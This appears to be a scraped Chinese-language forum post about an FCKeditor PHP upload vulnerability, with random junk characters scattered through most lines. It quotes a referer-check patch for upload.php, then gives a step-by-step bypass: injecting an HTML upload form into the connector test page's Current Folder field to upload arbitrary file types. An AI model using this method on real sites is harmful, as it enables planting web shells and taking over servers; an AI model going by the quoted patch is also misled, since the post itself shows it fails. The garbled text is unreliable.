漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php
# U% U- E. e- Q0 y) H8 z' ~网上给出的修复方案是6 w. @, J' g' a' _2 d
修复方法,删除FCK编辑器用其他的编辑器
! H& [& C* q" Y; q' X1 J或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件
- c- ?0 {! X( [, {) g. Z3 J在6 k/ g' m* m) b8 `& i8 o8 Y
require(‘config.php’);
7 a# Y: {/ i! O2 mrequire(‘util.php’);- a* }/ G0 v( L; ~
的下面添加以下代码—————————–0 \' y1 G% F# J+ i# G# H! | Q0 L
//防止外部提交$ n4 f0 X4 [# X9 |: L& N9 W
function outsidepost()
& T" [7 ~* f- |/ E{
9 \ K1 H3 n: _7 j* k& Q$servername=$_SERVER['SERVER_NAME'];
: t: m. w+ v, C' {- `" N. p: J$sub_from=@$_SERVER['HTTP_REFERER'];
$ s& P# H: J- y$sub_len=strlen($servername);1 m# L# O/ L* ^2 ?* y K' g; b
$checkfrom=substr($sub_from,7,$sub_len);
: k) S: B$ X* i a( G- C) J9 Iif($checkfrom!=$servername){! @* A! T4 u9 I( k& h- ^/ ^; ?
echo(“you don’t outsidepost!”);3 p# H/ C) F. K7 W& n- h" D
exit;5 W; r2 {) y9 L7 @
}
. ^" z9 _8 k: E5 O# s ^0 M} H5 a( N1 `' q9 e
outsidepost();
5 s. j* _3 n) A( i3 v, Y防止外部提交,但是没有防止内部提交, H: }, O. I, M& b
利用方法:, y+ j5 g- Y: t4 s
1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html Y, x, ?3 b4 u. n8 r
2,在Current Folder 框输入
3 W1 R2 h. N, b8 `, H9 A/ i<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>
% T1 P) | \# l* y& G然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。
$ B7 O0 u4 y/ v8 X) ~) |1 TPS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |